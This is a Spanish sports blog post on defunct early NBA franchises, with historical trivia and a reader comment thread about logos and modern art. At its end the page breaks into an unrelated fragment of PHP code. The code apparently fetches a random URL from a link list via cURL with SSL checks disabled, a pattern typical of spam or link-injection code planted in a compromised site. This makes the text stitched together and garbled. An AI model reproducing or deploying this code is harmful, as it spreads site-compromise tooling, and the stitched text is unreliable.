“Se me olvidó que te olvidé…” (II)

11 de February de 2010 por Sergio
Artículo 3 de 9 de la serie Historia de la NBA

Contínuamos el repaso a la franquicias que han desaparecido durante la existencia de la NBA. Todas con historias la mar de interesantes que merecen ser recordadas. Continuemos:

5. TORONTO HUSKIES

Este equipo canadiense sólo disputó la temporada 46-47. Sin embargo, como hemos señalado anteriormente, ha entrado en el libro de oro de la liga al disputar el primer partido de la historia frente a los NYK. Aquella única temporada estuvo plagada de infortunios y desavenencias entre jugadores y empresarios. Baste comentar que sólo 4 de los 20 jugadores que disputaron algún encuentro durante la temporada jugó mas de 10 partidos y que ninguno de los entrenadores volvieron a dirigir un solo encuentro en la liga. El promedio de victorias conseguido fue de un 36.7% (22-38) dejándolos fuera de la disputa por el título. El hogar del equipo durante aquel año fue el Maple Leaf Garden de Toronto, con una capacidad entorno a 14.000 espectadores y hogar a su vez de los más exitosos Toronto Maple Leafs de la NHL (Maple Leaf significa hoja de arce, simbolo de la bandera nacional canadiense).

Curiosidades:

– A pesar de haber disputado sólo una temporada, el equipo fue entrenado por 4 entrenadores distintos, dirigiendo Lew Hayman sólo un partido y Dick Fitzgerald tres.

– Lew Hayman, a su vez, ostentaba el cargo de General Manager, y posteriormente se convirtió en presidente de los Toronto Argonauts y de toda la liga canadiense de fútbol americano. En su juventud fue un destacado jugador de baloncesto en la Universidad de Syracuse.

– Ed Sadowski fue el máximo anotador del equipo en su única temporada pero además, fue el entrenador durante 12 partidos, tras los cuales abandonó el equipo por sus pobres resultados.

– Actualmente existe una plataforma en internet en la que la gente de Toronto quiere conseguir apoyo para cambiar el apodo del equipo actual de Raptors a los clasicos Huskies. Desde luego más Huskies tiene que haber en Toronto que dinosaurios pero bueno… De cualquier forma los Raptors vistieron el uniforme de los Huskies durante la temporada 2008, estando disponible para su venta en las páginas oficiales de la franquicia.

– Los colores de la vestimenta oficial eran azul y blanco.

6. PITTSBURGH IRONMEN

Esta franquicia de Penssylvania fue otra de las que tuvo un paso efimero por la BAA, disputando sólo la primera temporada. Los hombres de hierro finalizaron esa única temporada como el peor equipo de la liga con unos resultados de 45 derrotas por sólo 15 victorias. El estadio en el que se realizaban los encuentros como locales era el Duquesne Garden, espacio que no sobreviviría muchos años más tras la disolución del equipo pues fue demolido en 1956. Tenía una capacidad de alrededor de 5.500 espectadores, siendo sede a su vez de varios equipos de hockey donde sí fue un estadio innovador (por ejemplo, fue el primero en disponer de los famosos cristales alrededor del perímetro de juego).

Curiosidades:

– En este equipo jugaría Press Maravich, padre del genial jugador Pete Maravich y posterior entrenador de baloncesto. El hijo de este último, Josh, busca un puesto actualmente como profesional en las ligas mayores.

– Red Mihalik, a pesar de disputar sólo 7 partidos con el equipo es el único miembro del Hall of Fame con el que contó la franquicia. Eso sí, pasó a la posteridad como uno de los mejores ¡árbitros! de la historia de la competición.

– Otro jugador de los Ironmen, Jon Abramovic (nada que ver con el magnate ruso), tuvo un periplo universitario triunfal, convirtiéndose en el primer jugador en conseguir 2.000 puntos en la NCAA durante su etapa en la Salem International University.

7. CLEVELAND REBELS

Los rebeldes de Cleveland, al igual que los dos equipos anteriores, sólo llegaron a jugar los partidos correspondientes a aquella liga 46-47, si bien pudieron disputar las eliminatorias siendo derrotados por 2-1 por los NYK. Para dicha clasificación les fue suficiente con obtener un 50 % de victorias sobre los 60 partidos disputados, finalizando terceros de su división. El Cleveland Arena, con un aforo cercano a las 10.000 plazas fue la casa del equipo durante aquella breve historia profesional. Desde 1970 hasta 1977 fue el hogar de los posteriores Cleveland Cavaliers.

Curiosidades:

– En las filas de aquel equipo se encontraba Frank Baumholtz, uno de los máximos anotadores del equipo aquel año y, a la postre, un gran jugador de béisbol de la década de los 40-50 tras decidir cambiar de deporte debido a la desaparición del equipo de Cleveland. A este siíle fue bien el cambio baloncesto-béisbol, no como a otro que yo me sé…

– Mel Riebe, dos veces máximo anotador de la NBL formó parte de este equipo. Sin embargo, no pudo demostrar su valía en la recién creada competición cayendo al 4º puesto de anotadores dentro del equipo.

– En este equipo fue donde volvió a jugar Ed Sadowski tras su fugaz paso por los Huskies de Toronto. Posteriormente conseguiría afianzarse en la liga de la mano de los Boston Celtics, alcanzando el nombramiento para el equipo ideal de la temporada 1947-48 en la que se proclamó máximo anotador.

– Otro jugador que tuvo el honor de entrar en aquel vestuario fue Ken Sailors, innovador jugador que extendió el uso del lanzamiento con salto pues hasta ese momento casi todos los jugadores lanzaban con los pies en el suelo.

8. DETROIT FALCONS

Poco que contar de una franquicia que pasó sin pena ni gloria y sin apenas hacer ruido por aquella liga inaugural de la BAA. Obtuvo un récord de 20 partidos ganados por 40 perdidos, quedando penúltimos de su división. Su hogar fue el Detroit Olympia, un magnífico recinto que albergaría a los Red Wings y, posteriormente, y durante un pequeño espacio de tiempo, a los Pistons. Con un aforo de hasta 15.000 personas fue sede del All-Star de 1959 y de la mayoría de los conciertos recordados por los habitantes de la capital de Michigan.

Curiosidades:

– El posterior jugador de los Chicago Stags, Ed Miasek entró en la liga de la mano del equipo de la ciudad del motor. Durante aquella temporada inaugural terminó como 3º en la clasificiacion de puntos totales y 5º en la de asistencias, revelándose como uno de los jugadores mas completos de aquellos inicios.

9. BALTIMORE BULLETS

A pesar de que pueda parecer que los Bullets tuvieron una línea ininterrumpida de existencia que acabaría derivando en los actuales Washington Wizards, hubo un período desde 1954 hasta 1964 en los que la franquicia dejó de existir. De hecho, el equipo que inició su andadura en 1964 procedía de los Chicago Zephyrs y fue renombrada así en homenaje al original que estuvo disputando la liga entre 1948 y el ya mencionado 1954. Este equipo procedía de la ABL, donde consiguió el campeonato en la temporada 45-46, pasando a formar parte de la BAA en 1947, año en el que tuvo lugar la segunda temporada y en la que se vio reducido el numero de equipos inscritos de 12 a 8. Ese mismo año acabaría convirtiéndose en campeón de liga, ejemplificando la diferencia de potencial existente entre la emergente BAA respecto a ligas mas asentadas como la ABL y la NBL. Es, dentro de los equipos desaparecidos, el único que consiguió un título y el que más partidos disputó con 450 y un récord de 158-292, teniendo 3 apariciones en Playoffs. Durante las 7 temporadas en las que formó parte de la competición sufrió un progresivo y lento declive desde el 58.3% de victorias inicial al 22.2% de su última liga. A pesar de no finalizar primero durante la regular consiguió hacerse con el título en 1948 tras derrotar por 4-2 en la final a los Warriors de Joe Fulks. Antes se había deshecho con cierta comodidad de Stags y Knicks. Aunque no contaban con ninguna estrella de relumbrón (solo Buddy Jeannette formó parte del segundo equipo), su plantilla estaba formada por una amplia cantidad de jugadores en la que 6 de ellos lograron medias de más de 10 puntos por partido durante la temporada. El lugar en el que disputaban sus encuentros como locales era el Baltimore Colliseum que, con un aforo de 4.500 personas, fue testigo de la consecución del campeonato en aquel recordado año.

Curiosidades:

-El nombre de Bullets procedía de la marca de zapatillas Bata y, más concretamente, de su modelo deportivo Bata Bullets, que se producía en las cercanias de la ciudad de Baltimore, Maryland.

– Don Barksdale fue uno de los afroamericanos precursores que pudo demostrar su valía en la liga norteamericana y formó parte de la franquicia de Maryland durante la temporada 50-51. Dentro de su lista de logros destaca la medalla de oro en los juegos olímpicos de 1948, segunda persona de raza negra en ser nombrado All-American en su etapa universitaria y el ser el primer afroamericano en aparecer en un All-Star en 1953.

– Otro jugador de los Bullets, Ray Felix, es considerado el primer pivot dominador de raza negra, obteniendo el premio de Rookie of the Year con unos promedios de 17,6 puntos y 13,3 rebotes. Fue el siguiente afroamericano en ser nombrado All-Star tras el anteriormente mencionado Don Barksdale.

– Bob Houbregs, jugador de este equipo, fue posteriormente nombrado Hall of Fame, si bien su paso por la franquicia no fue todo lo satisfactoria que cabría esperar para un jugador que promedió 34,8 puntos en la Final Four universitaria.

– Buddy Jeannette ganó campeonatos en las 3 ligas existentes en la década de los 40 de la mano de Sheybogan Red Skins y Fort Wayne Pistons en la NBL y de los Bullets en la ABL. A su vez, también pasará a la posteridad como el primer jugador-entrenador que obtuvo el título de la BAA/NBA en 1948. A su vez entrenó a los Bullets posteriores a su desaparición durante 2 temporadas y entro en el Hall of Fame.

– Red Klotz es el tercer jugador más bajo de la historia en disputar un partido de la competición. A pesar de tener el honor de haber conseguido victorias frente a los Globetrotters cuando jugaba en los equipos que acompañaban a estos durante sus giras, acabó con un triste record de 6 partidos ganados frente a las mas de 13.000 derrotas que le inflingieron los trotamundos. Seguramente por ello fue nombrado Harlem Globetrotters Legend por el equipo.

– Otro jugador que pasó por el equipo, Paul Seymour, sigue ostentando actualmente la marca de más minutos disputados en un partido de Playoffs con 67 (junto a su compañero Red Rocha)

– Clair Bee, entrenador durante dos años, tambien fue incluido en el Hall of Fame.

Comenta

9 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Pedazo de serie…

    Los Toronto Huskies… si nos quejábamos del logo de los Staggs!!! si este parece que lo ha diseñado un párvulillo!!! Pero juer, si ya se movían cantidades importantes de dinero en esta liga ¿no existían siquiera dibujantes profesionales en aquella época??
    En fin, a mí el rollo Huskie me mola, pero los Raptors se han terminado convirtiendo en un equipo con solera… y con mucho mejor gusto en cuanto a diseño de logo y de vestuario.
    Apunte mental: Ed Sadowski

    Y vaya tela lo que se le parecía Pitt Maravich a su padre (que vaya tela de nombres tenían tb.) ¿Dices que su hijo Josh busca un puesto de profesional en las ligas mayores?? pero si debe de ser mayorcillo, ¿no?

    Me molan los nombres de REBELS, FALCONS y, cómo no, BULLETS, pero el de IRONMEN me produce picores…

      Citar

  2. Love Denise dice:
    #2

    Pues Deer, a mi estos logos con animalillos me molan, el de los Huskies, Stags, etc.. están bastante bien, peores son los dibujos y cuadros de Picasso, Duchamp… y toda la porquería que se pintó en el 1920 aprox en el estilo llamado “las vanguardias”, y hoy en día valen millones y millones de dolares.

      Citar

  3. TheDeerHunter dice:
    #3

    El problema no son los animalicos en sí… son los zotes que los diseñaron y que no sabían hacer la o con un canuto.

    Una cosa es la torpeza o la falta de técnica… y otra muy distinta es que no se digiera bien una expresión artística en concreto. No hay punto de comparación.

      Citar

  4. sergio dice:
    #4

    Pues no es tan mayor Deer… que tenga 25 años o asi. Se parece un monton a su padre, con el pelo muy parecido al de Ricky Rubio. Eso si, se ha quedado corto en cuanto a clase respecto a su padre.

      Citar

  5. Txusma dice:
    #5

    Es que es dificil no quedarse corto respecto al gran Pete Maravich

      Citar

  6. Toni dice:
    #6

    El de los Huskies parece un pobre perrillo tosiendo con la babilla colgando… y si yo fuera a enfrentarme a un equipo con tal dibujo en la camiseta, me entraría la risa, quizá sea una táctica para desconcentrarlos… jajaja.

      Citar

  7. Love Denise dice:
    #7

    Deer, si lo de los vanguardistas de los años 20 es arte, cualquier cosa es arte, si yo meto las manos en un charco de barro y acontinuación la pongo en la pared de mi casa, es arte, si cojo el zorullo de un perro en la calle y lo froto contra el vestido de la señora más pija del barrio, también es una expresión artística.

      Citar

  8. TheDeerHunter dice:
    #8

    No te sabría argumentar Denise. No soy un entendido en el tema.
    Pero tus comparaciones me parecen atrevidas, por calificarlas de alguna manera (jojojojo)

      Citar

  9. sergio dice:
    #9

    Para que nos entedamos… la forma de explicarse de Denise tambien es vanguardia jajajaj. Pero tampoco devaluemos tanto las tecnicas de Picasso… yo cuando veo el Guernica pienso en pena, muerte y ambientes dramaticos. Creo que eso es lo que queria reflejar. No es Velazquez pero ahi va…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>